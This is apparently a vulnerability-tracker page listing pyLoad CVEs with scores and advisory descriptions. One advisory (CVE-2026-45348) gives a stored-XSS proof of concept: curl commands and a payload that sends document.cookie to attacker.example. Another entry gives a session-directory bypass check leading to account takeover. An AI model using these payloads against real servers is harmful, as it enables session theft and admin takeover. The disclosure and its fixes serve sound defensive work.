VYPR
Get started
← All vendors
Vendor

Pyload

Sign in to watch
Products
1
CVEs
25
Across products
25
Status
Private

Products

1

Recent CVEs

25
CVESevRiskCVSSEPSSKEVPublishedDescription
CVE-2026-42313Hig0.548.30.00May 11, 2026pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The allowlist contains ("proxy", "username") and ("proxy", "password") — which protect the proxy credentials — but it does not include ("proxy", "enabled"), ("proxy", "host"), ("proxy", "port"), or ("proxy", "type"). Any authenticated user with the non-admin SETTINGS permission can enable proxying and point pyload at any host they control. From that point, every outbound download, captcha fetch, update check, and plugin HTTP call is transparently routed through the attacker. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100.
CVE-2026-42315Hig0.538.10.00May 11, 2026pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, when passing a folder name in the set_package_data() API function call inside the data object with key "_folder", there is no sanitization at all, allowing a user with Perms.MODIFY to specify arbitrary directories as download locations for a package. This vulnerability is fixed in 0.5.0b3.dev100.
CVE-2026-41133Hig0.508.80.00Apr 22, 2026pyLoad is a free and open-source download manager written in Python. Versions up to and including 0.5.0b3.dev97 cache `role` and `permission` in the session at login and continues to authorize requests using these cached values, even after an admin changes the user's role/permissions in the database. As a result, an already logged-in user can keep old (revoked) privileges until logout/session expiry, enabling continued privileged actions. This is a core authorization/session-consistency issue and is not resolved by toggling an optional security feature. Commit e95804fb0d06cbb07d2ba380fc494d9ff89b68c1 contains a fix for the issue.
CVE-2025-57751Hig0.500.00Aug 21, 2025pyLoad is the free and open-source Download Manager written in pure Python. The jk parameter is received in pyLoad CNL Blueprint. Due to the lack of jk parameter verification, the jk parameter input by the user is directly determined as dykpy.evaljs(), resulting in the server CPU being fully occupied and the web-ui becoming unresponsive. This vulnerability is fixed in 0.5.0b3.dev92.
CVE-2025-61773Hig0.468.10.00Oct 9, 2025pyLoad is a free and open-source download manager written in Python. In versions prior to 0.5.0b3.dev91, pyLoad web interface contained insufficient input validation in both the Captcha script endpoint and the Click'N'Load (CNL) Blueprint. This flaw allowed untrusted user input to be processed unsafely, which could be exploited by an attacker to inject arbitrary content into the web UI or manipulate request handling. The vulnerability could lead to client-side code execution (XSS) or other unintended behaviors when a malicious payload is submitted. user-supplied parameters from HTTP requests were not adequately validated or sanitized before being passed into the application logic and response generation. This allowed crafted input to alter the expected execution flow. CNL (Click'N'Load) blueprint exposed unsafe handling of untrusted parameters in HTTP requests. The application did not consistently enforce input validation or encoding, making it possible for an attacker to craft malicious requests. Version 0.5.0b3.dev91 contains a patch for the issue.
CVE-2026-45348hig0.45May 14, 2026## Summary The `packages.js` template at `src/pyload/webui/app/themes/modern/templates/js/packages.js:172` interpolates a stored link URL into a template literal inside single-quoted HTML and then writes the result to the DOM via `$(div).html(html)`. No escaping runs between the API value and `innerHTML`. An attacker (Alice) who can submit a package link puts a single quote plus event handler into the URL, breaks out of the attribute, and executes JavaScript in every operator's browser that opens the downloads view. The theme does not set a Content Security Policy that restricts inline script or event handlers. ## Details **Sink**: `src/pyload/webui/app/themes/modern/templates/js/packages.js:165-188`: ```javascript const html = ` <span class='child_status'> <span style='margin-right: 2px;color: #337ab7;' class='${link.icon}'></span> </span> <span style='font-size: 16px; font-weight: bold;'> <a onclick='return false' href='${link.url}'>${link.name}</a> </span><br/> <div class='child_secrow' ...> <span class='child_status' ...>${link.statusmsg}</span>&nbsp;${link.error}&nbsp; <span class='child_status' ...>${link.format_size}</span> <span class='child_status' ...> ${link.plugin}</span>... </div>`; const div = document.createElement("div"); $(div).attr("id", `file_${link.id}`); $(div).css("padding-left", "30px"); $(div).css("cursor", "grab"); $(div).addClass("child"); $(div).html(html); ``` `link.url` flows in from `/api/get_package_data`, which returns the URL exactly as stored. Seven other fields on the same element (`link.name`, `link.statusmsg`, `link.error`, `link.format_size`, `link.plugin`, `link.icon`, `link.id`) share the same unescaped injection surface. **Source**: `src/pyload/core/api/__init__.py:541-600` (`add_package`) and the `/api/add_package` JSON route store the attacker-supplied `links` list without HTML escaping. The `add_package` URL sanitizer only strips `http://`, `https://`, `../`, `..\\`, `:`, and `/` from the folder *name*, not the link URL itself. **Mitigation gap**: `src/pyload/webui/app/__init__.py:63-72` sets security headers but has no `Content-Security-Policy` header. The only script-related header is `X-XSS-Protection`, which is a no-op on modern browsers. ## Proof of Concept **Actor**: Alice (authenticated user with `Perms.ADD`). Reproduces against pyload 0.5.0-dev at `f081a16`. ```bash TARGET="http://<pyload-host>:<port>" # Alice logs in. CSRF=$(curl -sS -c /tmp/alice.jar "$TARGET/login" | grep -oP 'name="csrf_token" value="\K[^"]+') curl -sS -b /tmp/alice.jar -c /tmp/alice.jar -X POST "$TARGET/login" \ -d "csrf_token=$CSRF&do=login&username=alice&password=alice123" -o /dev/null API_CSRF=$(curl -sS -b /tmp/alice.jar "$TARGET/" | grep -oP 'name="csrf-token" content="\K[^"]+') # Alice creates a package whose link URL breaks out of the href attribute # and installs an onmouseover payload. curl -sS -b /tmp/alice.jar -X POST "$TARGET/api/add_package" \ -H "X-CSRFToken: $API_CSRF" -H "Content-Type: application/json" \ -d $'{"name":"xss-pkg","links":["http://x\' onmouseover=\'fetch(`//attacker.example/`+document.cookie)"]}' ``` The package lands in the collector (the default destination). Alice can also pass `"dest":1` to place it in the queue instead. Both `/collector` and `/queue` render the same `packages.html` template, which loads `packages.js`. When any user (including the admin `pyload`) opens `/collector` or `/queue` and hovers the injected file row, the browser parses the anchor as: ```html <a onclick='return false' href='http://x' onmouseover='fetch(`//attacker.example/`+document.cookie)'>http://x' onmouseover='fetch(`//attacker.example/`+document.cookie)</a> ``` The `onmouseover` handler fires on hover and exfiltrates the session cookie. A `javascript:` URL in the `href` triggers on click without hover. ## Impact Any user who can reach `/api/add_package` (which covers the `Perms.ADD` role, the common baseline for operator users) plants JavaScript that runs in an admin's browser the next time that admin opens the downloads view. The admin's session cookie is in the same origin, so Alice receives it directly. Holding the admin cookie, Alice hits every admin-only endpoint: arbitrary plugin upload, configuration rewrite, reconnect-script RCE, and so on. The attack is stored, persists across reboots, and does not require any interaction from the victim beyond visiting `/collector` or `/queue`, the two pages operators use constantly. The CNL Blueprint exposes a sibling attack surface: when pyload runs with the ClickNLoad handler enabled, an unauthenticated network attacker calls `POST /flash/add` with the same injected URL and reaches the same sink without logging in. `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N` (High, 8.3). CWE-79. ## Recommended Fix Two changes. First, escape every `${link.*}` interpolation in the template. jQuery's `.text()` escapes by default; structure the render so attacker-controlled strings never reach `.html()`: ```javascript const a = $("<a/>").attr("href", link.url).text(link.name); const status = $("<span/>").text(link.statusmsg); // ... build the DOM with .text() / .attr() calls ... $(div).append(a).append(status); ``` If keeping the template-literal style, at minimum wrap every `${link.*}` in a helper that HTML-escapes: ```javascript const esc = (s) => String(s).replace(/&/g, "&amp;").replace(/</g, "&lt;") .replace(/>/g, "&gt;").replace(/"/g, "&quot;").replace(/'/g, "&#39;"); ``` Second, deploy a strict CSP. `default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'self'` kills the inline-handler class entirely, and pyload's own assets already load from `'self'`. Audit the sibling templates (`queue.js`, `dashboard.js`, all admin themes) for the same pattern. --- *Found by [aisafe.io](https://aisafe.io)*
CVE-2026-42312Med0.446.80.00May 11, 2026pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The option ("general", "ssl_verify") is not on that allowlist. Any authenticated user with the non-admin SETTINGS permission can set general.ssl_verify = off, and every subsequent outbound pycurl request is made with SSL_VERIFYPEER=0 and SSL_VERIFYHOST=0 — TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100.
CVE-2026-42314Med0.426.50.00May 11, 2026pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, package folder names are sanitized using insufficient string replacement. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS. This vulnerability is fixed in 0.5.0b3.dev100.
CVE-2026-35464Hig0.427.50.00Apr 7, 2026pyLoad is a free and open-source download manager written in Python. The fix for CVE-2026-33509 added an ADMIN_ONLY_OPTIONS set to block non-admin users from modifying security-critical config options. The storage_folder option is not in this set and passes the existing path restriction because the Flask session directory is outside both PKGDIR and userdir. A user with SETTINGS and ADD permissions can redirect downloads to the Flask filesystem session store, plant a malicious pickle payload as a predictable session file, and trigger arbitrary code execution when any HTTP request arrives with the corresponding session cookie. This vulnerability is fixed with commit c4cf995a2803bdbe388addfc2b0f323277efc0e1.
CVE-2026-40071Med0.355.40.00Apr 9, 2026pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the /json/package_order, /json/link_order, and /json/abort_link WebUI JSON endpoints enforce weaker permissions than the core API methods they invoke. This allows authenticated low-privileged users to execute MODIFY operations that should be denied by pyLoad's own permission model. This vulnerability is fixed in 0.5.0b3.dev97.
CVE-2026-33992Med0.356.50.00Mar 27, 2026pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, PyLoad's download engine accepts arbitrary URLs without validation, enabling Server-Side Request Forgery (SSRF) attacks. An authenticated attacker can exploit this to access internal network services and exfiltrate cloud provider metadata. On DigitalOcean droplets, this exposes sensitive infrastructure data including droplet ID, network configuration, region, authentication keys, and SSH keys configured in user-data/cloud-init. Version 0.5.0b3.dev97 contains a patch.
CVE-2026-44226Med0.345.30.00May 11, 2026pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, pyload-ng WebUI returns full Python traceback details to clients on unhandled exceptions. Because /web/<path:filename> is reachable without authentication and renders attacker-controlled template names, an unauthenticated user can reliably trigger a server exception (for example by requesting a non-existent template) and receive internal stack traces in the HTTP response. This vulnerability is fixed in 0.5.0b3.dev100.
CVE-2026-453060.00May 14, 2026## Summary The fix for CVE-2026-33509 prevents setting `storage_folder` inside `PKGDIR` or `userdir`, but does NOT protect the Flask session directory (`/tmp/pyLoad/flask`). An authenticated attacker can set `storage_folder` to the session directory and download session files of other users via `/files/get/`, leading to account takeover. ## Details The fix in `src/pyload/core/api/__init__.py`: ```python directories = [PKGDIR, userdir] if any(directories[0].startswith(d) for d in directories[1:]): return # blocked ``` But the Flask session directory is: ```python session_storage_path = os.path.join(api.get_cachedir(), "flask") # = /tmp/pyLoad/flask ← NOT blocked by fix ``` ## Attack Chain 1. Attacker (admin) sets `storage_folder = /tmp/pyLoad/flask` 2. Fix does NOT block this — `/tmp/pyLoad/flask` not inside `PKGDIR` or `userdir` 3. Attacker requests `GET /files/get/<victim_session_filename>` 4. `send_from_directory('/tmp/pyLoad/flask', session_file)` serves victim's session 5. Attacker uses stolen session → **Account Takeover** ## PoC <img width="592" height="408" alt="POC" src="https://github.com/user-attachments/assets/936b9f56-325b-437d-9edd-e0d5bb995187" /> ```python import os PKGDIR = "/usr/lib/python3/dist-packages/pyload" userdir = os.path.expanduser("~/.pyload") session_dir = "/tmp/pyLoad/flask" correct_case = lambda x: x directories = [ correct_case(os.path.join(os.path.realpath(d), "")) for d in [session_dir, PKGDIR, userdir] ] blocked = any(directories[0].startswith(d) for d in directories[1:]) print(f"Fix blocks session_dir: {blocked}") # Output: Fix blocks session_dir: False ← BYPASS CONFIRMED ``` ## Impact Authenticated admin can steal sessions of other users → Account Takeover. ## Suggested Fix ```python blocked_dirs = [PKGDIR, userdir, api.get_cachedir()] directories = [ os.path.join(os.path.realpath(d), "") for d in [value] + blocked_dirs ] if any(directories[0].startswith(d) for d in directories[1:]): return ```
CVE-2026-335110.000.00Mar 24, 2026pyLoad is a free and open-source download manager written in Python. From version 0.4.20 to before version 0.5.0b3.dev97, the local_check decorator in pyLoad's ClickNLoad feature can be bypassed by any remote attacker through HTTP Host header spoofing. This allows unauthenticated remote users to access localhost-restricted endpoints, enabling them to inject arbitrary downloads, write files to the storage directory, and execute JavaScript code. This issue has been patched in version 0.5.0b3.dev97.
CVE-2026-335090.000.00Mar 24, 2026pyLoad is a free and open-source download manager written in Python. From version 0.4.0 to before version 0.5.0b3.dev97, the set_config_value() API endpoint allows users with the non-admin SETTINGS permission to modify any configuration option without restriction. The reconnect.script config option controls a file path that is passed directly to subprocess.run() in the thread manager's reconnect logic. A SETTINGS user can set this to any executable file on the system, achieving Remote Code Execution. The only validation in set_config_value() is a hardcoded check for general.storage_folder — all other security-critical settings including reconnect.script are writable without any allowlist or path restriction. This issue has been patched in version 0.5.0b3.dev97.
CVE-2026-333140.000.00Mar 24, 2026pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, a Host Header Spoofing vulnerability in the @local_check decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS). This issue has been patched in version 0.5.0b3.dev97.
CVE-2026-328080.000.00Mar 20, 2026pyLoad is a free and open-source download manager written in Python. Versions before 0.5.0b3.dev97 are vulnerable to path traversal during password verification of certain encrypted 7z archives (encrypted files with non-encrypted headers), causing arbitrary file deletion outside of the extraction directory. During password verification, pyLoad derives an archive entry name from 7z listing output and treats it as a filesystem path without constraining it to the extraction directory. This issue has been fixed in version 0.5.0b3.dev97.
CVE-2026-297780.000.00Mar 7, 2026pyLoad is a free and open-source download manager written in Python. From version 0.5.0b3.dev13 to 0.5.0b3.dev96, the edit_package() function implements insufficient sanitization for the pack_folder parameter. The current protection relies on a single-pass string replacement of "../", which can be bypassed using crafted recursive traversal sequences. This issue has been patched in version 0.5.0b3.dev97.
CVE-2025-548020.000.01Aug 5, 2025pyLoad is the free and open-source Download Manager written in pure Python. In versions 0.5.0b3.dev89 and below, there is an opportunity for path traversal in pyLoad-ng CNL Blueprint via package parameter, allowing Arbitrary File Write which leads to Remote Code Execution (RCE). The addcrypted endpoint in pyload-ng suffers from an unsafe path construction vulnerability, allowing unauthenticated attackers to write arbitrary files outside the designated storage directory. This can be abused to overwrite critical system files, including cron jobs and systemd services, leading to privilege escalation and remote code execution as root. This issue is fixed in version 0.5.0b3.dev90.
CVE-2024-478210.000.02Oct 25, 2024pyLoad is a free and open-source Download Manager. The folder `/.pyload/scripts` has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved in versions prior to 0.5.0b3.dev87. A file can be downloaded to such a folder by changing the download folder to a folder in `/scripts` path and using the `/flashgot` API to download the file. This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system. Version 0.5.0b3.dev87 fixes this issue.